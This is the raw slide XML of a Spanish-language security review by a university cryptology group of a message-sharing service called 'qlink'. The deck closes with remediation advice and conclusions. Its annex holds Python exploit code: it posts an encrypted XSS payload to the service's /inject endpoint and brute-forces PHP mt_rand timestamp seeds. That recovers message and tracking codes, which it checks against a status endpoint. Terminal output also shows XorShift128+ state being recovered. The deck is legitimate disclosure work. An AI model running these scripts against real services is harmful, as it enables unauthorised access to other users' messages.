              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>criptográfica”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 l="2917" t="9630" r="27917" b="14815"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9046695" y="4114800"/>
            <a:ext cx="14881411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Operaciones criptográficas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Método para la obtención</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>de números aleatorios de</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>librería </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>CryptoJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> basado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>en un recorte del método</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Math.Random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 l="23333" t="20370" r="46250" b="30741"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10283825" y="3429000"/>
            <a:ext cx="12649200" cy="9920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Operaciones criptográficas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Método </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Math.Random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>basado en XorShift128+</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 t="8148" r="65000" b="7037"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="16910050" y="3536950"/>
            <a:ext cx="7467600" cy="1017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 cstate="print"/>
          <a:srcRect l="17083" t="12222" r="42500" b="14444"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8759825" y="3657600"/>
            <a:ext cx="8077200" cy="100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Operaciones criptográficas – trabajo relacionado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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 l="15833" t="14074" r="17917" b="39259"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1444625" y="5486400"/>
            <a:ext cx="20769943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Acerca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del GICSI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70423" y="4732033"/>
            <a:ext cx="21868940" cy="30397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MX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El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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Grupo de Investigación en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4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Criptología</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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y Seguridad Informática (GICSI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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realiza sus actividades en el laboratorio (CRIPTOLAB) perteneciente a la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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Escuela Superior Técnica, Facultad de Ingeniería, Universidad Nacional de la Defensa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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. Está formado por profesionales especializados en el área de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="48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Criptología</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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y la Seguridad Teleinformática. Diplomados en las disciplinas Informática y Matemática.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="4800" b="1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4947773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l="17917" t="14444" r="43750" b="72223"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2130425" y="9753600"/>
            <a:ext cx="18440399" cy="360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Operaciones criptográficas – herramientas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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 l="16667" t="8148" r="42083" b="30741"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="301625" y="5638800"/>
            <a:ext cx="9372600" cy="781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8003" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="16250" t="8519" r="50833" b="11481"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="16306800" y="3276600"/>
            <a:ext cx="7540625" cy="10308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6250" t="8659" r="43750" b="18889"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9064625" y="5334000"/>
            <a:ext cx="8077200" cy="822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4800" dirty="0" smtClean="0"/>
              <a:t>Operaciones criptográficas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Estimación de fecha/hora de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>qlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t> anterior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-MX" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr hangingPunct="0"/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punto_2_2_1.py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generado: http://qlink/two/f88cHwhwVDkl4HN92XymdE#123456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obteniendo semilla...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semilla de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creado: f88cHwhwVD -&gt; 1496390487982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el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anterior al recientemente creado fue generado, aproximadamente, entre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Mon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May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15 21:44:53 2017 y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Mon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AR" sz="4800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>May</a:t>
            </a:r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 15 21:46:32 2017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4800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR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dirty="0" smtClean="0"/>
              <a:t>Operaciones criptográficas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Obtención de "número DN“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/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punto_2_2_2.py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generado (ejemplo): http://qlink/two/lQ9PvYWZrJGyTmqEvPeiiX#123456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obtenido: 8576041210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obteniendo semilla...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semilla de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generado: lQ9PvYWZrJ -&gt; 1496555563119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para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timing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#0 generado: http://qlink/two/IoePfzTwYziTuniQBUmReN#123456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: 4523295259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para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timing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#1 generado: http://qlink/two/lvaaKCsFbIUb8tBgSAuIqk#123456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: 7097969091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[…]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para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timing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#9 generado: http://qlink/two/cNR7bGgGzjdDPJ9hRN4N4t#123456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: 6566803103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diferencia entre semilla para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#0: 1110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diferencia entre semilla para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#1: 192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diferencia entre semilla para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#2: 103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[…]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diferencia entre semilla para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 #9: 134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probando semilla: 1496555563214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trk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: 3000169741 (0/1015)...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status: FAIL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probando semilla: 1496555563215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trk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: 5334132004 (1/1015)...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status: FAIL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[…]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probando semilla: 1496555563653 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>trk</a:t>
            </a:r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: 8097925954 (439/1015)...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status: OK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400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="24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s-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r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problemas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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2400">
            <a:off x="1370927" y="4350582"/>
            <a:ext cx="20574073" cy="15927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dirty="0" smtClean="0"/>
              <a:t>Operaciones criptográficas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Problemas heredados desde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>CryptoJS</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr hangingPunct="0"/>
            <a:endParaRPr lang="es-AR" sz="2800" i="1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s-AR" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r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 punto_2_2_3.py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se estimarán valores siguientes considerando salida conocida: f7f195a46835dd93 f37e44f2afe372308cb09ca5c102323d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BROWSER: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chrome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resolviendo...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modelo resuelto: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[c1480396913101804 = True,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800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ostate0 = 14459375271365247648,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800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ostate1 = 12664944705117373901,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800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c149958108320120 = True,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800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c1353346471225766 = True,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800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c476870980001021 = True,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800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c525365255680336 = True,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2800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c1015901882049230 = True]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2800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>siguientes 200 x 4bytes estimados: 7af3b8eac</a:t>
            </a:r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[…]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2800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>22a271baf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encontrados siguientes 16bytes generados en browser? True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2800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800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endParaRPr lang="es-AR" sz="4800" b="1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Posibles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soluciones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4" y="4350979"/>
            <a:ext cx="21716806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800" dirty="0" smtClean="0"/>
              <a:t>Respecto al problema de XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>recibiéndose el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>mensaje cifrado mediante el algoritmo AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>, por supuesto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>no se podría verificar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>ni filtrar el contenido desde los scripts PHP que procesan, en el servidor, la información enviada. Por lo tanto la única alternativa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>sería aplicar filtros antes de presentar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>el contenido descifrado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Para generar números aleatorios, no utilizar funciones inseguras ni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>timestamps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> como semillas. Tampoco (directamente) otra información como códigos de teclas presionadas o posición del puntero. Para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>, utilizar la función </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>RandomSource.getRandomValues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>() de la nueva Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Crypto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> API. Para PHP, la obtener números aleatorios leyéndolos desde el archivo especial /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>urandom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> (Linux) u desde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenSSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> (ya usado a través del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> para los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>x_tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800" b="1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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530225" y="887484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Conclusiones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4" y="4350979"/>
            <a:ext cx="21716806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hangingPunct="0"/>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Si bien, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>salvo por el primero de los casos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>, detallado en el punto 2, las potenciales vulnerabilidades </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>podrían no representar un riesgo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>real, la utilización de herramientas y mecanismos de desarrollo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>diferentes a las recomendadas en buenas prácticas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>en relación a la seguridad en general, y a la implementación de criptografía en particular, hacen que se concluya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>prudente esperar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>otras revisiones del sistema o información ampliada por parte de sus desarrolladores.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800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111625" y="53340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Muchas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 gracias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2968625" y="51054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Anexo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 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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código</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="13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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="13800" b="1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</a:rPr>
              <a:t>fuente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8825" y="609600"/>
            <a:ext cx="21183600" cy="128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-*- coding: utf-8 -*-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requests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base64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binascii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hashlib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Crypto.Cipher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import AES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math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time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#####################################################################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'http://qlink'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mensaje_ql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'Mensaje de prueba'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alert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'Prueba XSS'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#####################################################################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sesión de módulo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requests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para usar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keep-alive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sess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requests.Session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encabezados http, copiados de un navegador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headers = {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Accept':'application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text/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*/*; q=0.01',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'Accept-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Encoding':'gzip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deflate',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'Accept-Language':'es-419,es;q=0.8',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Connection':'keep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-alive',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'Content-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Type':'application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/x-www-form-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urlencoded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=UTF-8',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Host':url.replace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('http://', '').replace('https://', ''),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Origin':url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Referer':url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+'/',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'User-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Agent':'Mozilla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/5.0 (Windows NT 6.1; WOW64)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AppleWebKit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/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36',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'X-Requested-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With':'XMLHttpRequest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obtener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token fresco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r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sess.get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'/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tokenizer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 headers=headers, data={})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x_token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r.json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()['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x_token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generar parámetro simulando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de Date().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getTime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random_hash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time.time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()) * 1000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mensaje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mensaje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mensaje_ql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+ "&lt;/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textarea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&gt;&lt;script&gt;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alert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('"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alert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+ "')&lt;/script&gt;"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mensaje = "%%A%%" + mensaje + "%%C%%"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password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cualesquiera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password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b'123456'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"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ffffffffffffffff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" # ejemplo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"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ffffffffffffffffffffffffffffffff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" # ejemplo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iters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100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generación de llave para aes, simulando también versión original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llave = hashlib.pbkdf2_hmac('sha1',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password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binascii.unhexlify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iters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dklen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=32)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cifrado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cipher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AES.new(llave, AES.MODE_CBC,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binascii.unhexlify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data = base64.b64encode(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cipher.encrypt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mensaje.ljust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math.ceil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(mensaje) / 16.0) * 16), b'\0')))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para envío a web-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service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data = {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':'{"data":"' + data + '","salt":"' + salt + '","iv":"' + iv + '","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":'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iters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 + ',"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decom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":"false"}',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imprint':'false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captcha':'false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randomHash':random_hash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from':'web_app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x_token':x_token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lang':'es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replyIntent':'false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'n':'180'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envío a servidor e impresión de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generado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r = sess.post(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'/inject', headers=headers, data=data)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'mensaje del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mensaje_ql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'mensaje para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alert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alert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print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r.json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()['hash'] + '#' + password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8825" y="609600"/>
            <a:ext cx="21183600" cy="128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-*- coding: utf-8 -*-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requests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base64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binascii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hashlib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Crypto.Cipher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import AES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math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time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#####################################################################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'http://qlink'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esperar = False # para esperar un segundo entre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requests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#####################################################################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sesión de módulo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requests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para usar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keep-alive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sess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requests.Session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encabezados http, copiados de un navegador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headers = {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Accept':'application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text/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*/*; q=0.01',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'Accept-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Encoding':'gzip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deflate',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'Accept-Language':'es-419,es;q=0.8',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Connection':'keep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-alive',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'Content-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Type':'application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/x-www-form-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urlencoded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=UTF-8',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Host':url.replace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('http://', '').replace('https://', ''),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Origin':url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Referer':url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+'/',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'User-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Agent':'Mozilla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/5.0 (Windows NT 6.1; WOW64)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AppleWebKit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/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36',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'X-Requested-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With':'XMLHttpRequest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obtener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token fresco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r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sess.get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'/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tokenizer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 headers=headers, data={})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x_token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r.json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()['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x_token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dentro de una función ahora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generar_qlink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mensaje_ql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generar parámetro simulando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de Date().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getTime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random_hash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time.time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()) * 1000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mensaje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mensaje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mensaje_ql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mensaje = "%%A%%" + mensaje + "%%C%%"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password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cualesquiera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password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b'123456'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"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ffffffffffffffff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"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ffffffffffffffffffffffffffffffff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iters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100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generación de llave para aes, simulando también versión original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llave = hashlib.pbkdf2_hmac('sha1',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password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binascii.unhexlify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iters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dklen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=32)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cifrado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cipher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AES.new(llave, AES.MODE_CBC,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binascii.unhexlify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data = base64.b64encode(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cipher.encrypt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mensaje.ljust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math.ceil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(mensaje) / 16.0) * 16), b'\0')))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para envío a web-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service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data = {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':'{"data":"' + data + '","salt":"' + salt + '","iv":"' + iv + '","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":'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iters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 + ',"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decom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":"false"}',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imprint':'false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captcha':'false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randomHash':random_hash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from':'web_app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x_token':x_token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lang':'es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replyIntent':'false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'n':'180'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envío a servidor y retorno de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generado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r = sess.post(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'/inject', headers=headers, data=data)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r.json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()['hash'] + '#' + password,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r.json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()['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']).replace('DN ', ''))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obtención de semilla por fuerza bruta desde máximo (fecha/hora actual)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obtener_semilla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parcial_qlink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chars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'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'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epoch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time.time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aproximaciones...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len_prueba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60*60*24*1000*2 # probar a lo sumo dos días hacia atrás desde máximo posible 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ii = 99999 + 999 + epoch * 1001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max = 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len_prueba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php_rand.mt_srand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((0xFFFFFFFF &amp; (ii-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for j in range(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parcial_qlink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g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php_rand.mt_rand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(chars)-1)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if chars[g] !=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parcial_qlink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[j]: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break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if (j + 1 &gt; max):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max = j + 1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if max == 10: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    return ii-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% 100000 == 0):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".",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obtención de semilla de número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obtener_semilla_dn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dn_qlink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semilla):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chars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'0123456789'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ii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semilla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aproximaciones...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len_prueba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2*99999 # probar a lo sumo dos segundos hacia adelante (parte en microsegundos que se agrega)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max = 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len_prueba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php_rand.mt_srand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((0xFFFFFFFF &amp;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ii+i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for j in range(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dn_qlink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g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php_rand.mt_rand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(chars)-1)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if chars[g] !=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dn_qlink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[j]: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break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if (j + 1 &gt; max):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max = j + 1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if max == 10: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    return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ii+i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% 100000 == 0):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".",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obtención de semilla de número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específica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obtener_semilla_dn_fix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(semilla):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chars = '0123456789'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ii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semilla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php_rand.mt_srand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((0xFFFFFFFF &amp; (ii)))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 = ''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for j in range(10):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g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php_rand.mt_rand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(chars)-1)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ret = ret + chars[g]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return ret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generación de un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dn_original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generar_qlink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('prueba')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generado (ejemplo):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+ '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obtenido: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dn_original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obtener semilla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'obteniendo semilla...'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ql_parcial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 + 5:len(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 + 15]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semilla_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obtener_semilla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ql_parcial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'semilla de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generado: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ql_parcial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+ ' -&gt;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(semilla_)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# obtener semilla de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semilla_dn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_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obtener_semilla_dn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dn_original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semilla_)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'semilla de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generado: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dn_original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+ ' -&gt;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semilla_dn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_)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'diferencia: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semilla_dn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_ - semilla_)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max_req_timing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10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max_req_timing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* [0]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max_req_timing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* [0]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min_diff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9999999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max_req_timing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])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generar_qlink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prueba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#'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print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para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timing #'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 + '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generado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 + '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esperar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'esperando un segundo...'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time.sleep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(1)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max_req_timing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ql_parcial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[i][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 + 5:len(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 + 15]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s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obtener_semilla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ql_parcial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s2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obtener_semilla_dn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], s)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print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diff = s2 - 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if diff &gt;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diff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if diff &lt;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min_diff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min_diff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diff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print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diferencia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entre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semilla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para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#'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 + ': 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(diff)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range(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min_diff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ii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semilla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_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min_diff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trk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obtener_semilla_dn_fix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(ii)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print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probando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semilla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(ii) + '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trk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trk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 + ' ('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 + '/'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max_diff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min_diff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 + ')...'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data = {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trk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':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trk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}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 = sess.post(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'/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gtrkstatus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 headers=headers, data=data)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status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r.json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()['status']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trkStatus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r.json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()['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trkStatus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print 'status: ' + status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if status != 'FAIL':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break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esperar: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'esperando un segundo...'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time.sleep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(1)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Acerca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de la DGT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6" y="4728628"/>
            <a:ext cx="12115077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La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES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Dirección de Gestión Tecnológica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES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, abocada a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES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administrar, desarrollar, proveer y controlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES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 los bienes y servicios de apoyo administrativo-informáticos, tecnológicos y de comunicaciones para el proceso de datos y acceso a la información, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES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así como investigar e implementar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4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tecnologías de vanguardia que garanticen la disponibilidad, integridad y confiabilidad de la información. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4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"/>
                <a:ea typeface="Montserrat"/>
              </a:rPr>
              <a:t>(Resolución del Ministerio de Seguridad N° 1015/12)</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="1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4947773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1" descr="C:\Users\Ariel\Desktop\tmp-proyecto\ps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46225" y="4038600"/>
            <a:ext cx="8229600" cy="822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8825" y="609600"/>
